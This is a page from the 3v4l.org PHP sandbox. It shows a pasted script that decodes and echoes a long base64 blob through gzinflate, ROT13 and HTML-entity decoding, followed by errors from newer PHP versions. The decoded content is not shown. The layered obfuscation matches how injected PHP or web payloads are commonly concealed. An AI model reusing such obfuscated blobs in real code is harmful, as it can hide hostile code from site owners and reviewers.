3v4l.org

run code in 300+ PHP versions simultaneously
<?php function rotate($string) { $length = strlen($string); $result = ''; for($i = 0; $i < $length; $i++) { $ascii = ord($string{$i}); $rotated = $ascii; if ($ascii > 64 && $ascii < 91) { $rotated += -13; $rotated > 90 && $rotated += -90 + 64; $rotated < 65 && $rotated += -64 + 90; } elseif ($ascii > 96 && $ascii < 123) { $rotated += -13; $rotated > 122 && $rotated += -122 + 96; $rotated < 97 && $rotated += -96 + 122; } $result .= chr($rotated); } return $result; } echo(stripslashes(html_entity_decode(rotate(gzinflate(base64_decode('lVTva9tIEP3cQP6HCWeMXYKUHxDaGlGSICl3KSFVSUrTFqFVVquzzWY9tvZOKv3fOyvt2rLTcr18iLWaN/PevpnRi0EOAaxQqOliNJ7s771oXxSCpxzzWiocvY+8L8M/jk5fTxq2KGss7MnbCqTyHzkrUHJVlQVyBzq0v+44yC2JFBXxDNIoCf9Mws82Ht2G95dxen7zkNg3X/vwviwb960o/yca/O7Zy6v8l3KosFE0WPFCCySOL8PHkolJJUT+xvftCbxnUu/i+DK9u4hiJ9RgTDmqRvWKx5qkFkEzN0+PJfL5yBaLkk/JbQwv4UN48eD4vMHiKefo2ePOTeCvuyRMQC+CYwswoqeVrnE04GxqaZbUxyqVnMv5yCkYj/f3vu3vAQyoUiYbBPoj5ynLXcUGeo4T+m/k+l+cP0fbwDZasTIT/CdoG9hG60ynNvAbaMWapsy0mD+vbQPb+M63WjdabON7gV2GLEMlNMuKXYZ1YDsDZ6ouFygXu5rWgR7+u0kxSZl8qvF4M2TUWnIzWI9AN4QThzzpIxVHEQzW5rdv18jTDTLntBBKBMevHMiyl7zeoKbTqSdnM114K+6TjznLMBOFeUxVWQjW0NSVec648Dk2TCDN0krTAkrjRrdSrnxHoJcwWpZZ61aKVFoUbkkVcafUdGf7eAzfuiRjvtnsNWK0vX9G9Vtn3FA2+cR50z+c9paiq9rWK1CwXMCIKA7h9ir8dEHfljCJr8LzOLw5jz4k4SEcjyfw31nx/UNycRW38LVyakbH7y6AM1Qmb0eHqlmB/fffAesCNx6gqpjrzLCmbjeyrocrMXnHSsgQFyAYWCpRIShSBbV+4pJWTmcwZyWHy7tLoHld6lXZNQmWjMPNx5triNrBh6v2U0KlXJsMl78m254XUjXTwgnufjaNPuhdvu1E+69nyUEQLKW55E7UTO9BYOeAs0qU8uTs7MwNxm948vxGU86yFZjiS626qxOLZ7KeOPgmCW5ZPud6VVFj1RhOjo5eg4lLqDgunR47dP3lsJGW+Pr6PoL7TCDPUEDE6rL9MrQuSoP4P37u7/l+/47d7r8B+xHYJP8A'))), ENT_QUOTES)));
Output for git.master, git.master_jit
Fatal error: Array and string offset access syntax with curly braces is no longer supported in /in/R24St on line 6
Process exited with code 255.
Output for rfc.property-hooks
Parse error: syntax error, unexpected token "{", expecting ")" in /in/R24St on line 6
Process exited with code 255.

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page


preferences:
45.04 ms | 401 KiB | 8 Q